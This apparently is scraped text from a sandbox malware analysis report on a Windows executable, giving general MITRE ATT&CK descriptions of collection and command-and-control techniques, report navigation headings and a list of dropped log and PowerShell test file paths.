Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FGGx944Qu7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FGGx944Qu7.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TBsjWljiCpR.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\20291vC

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1k4wtsks.qys.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1rfx4p55.jzt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2odq22e3.wb2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uya4cokv.3zx.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wftn1kob.rrm.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wms5kunf.vwh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ys2tmhij.gni.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zuw0b1st.zey.ps1

Windows Analysis Report
FGGx944Qu7.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre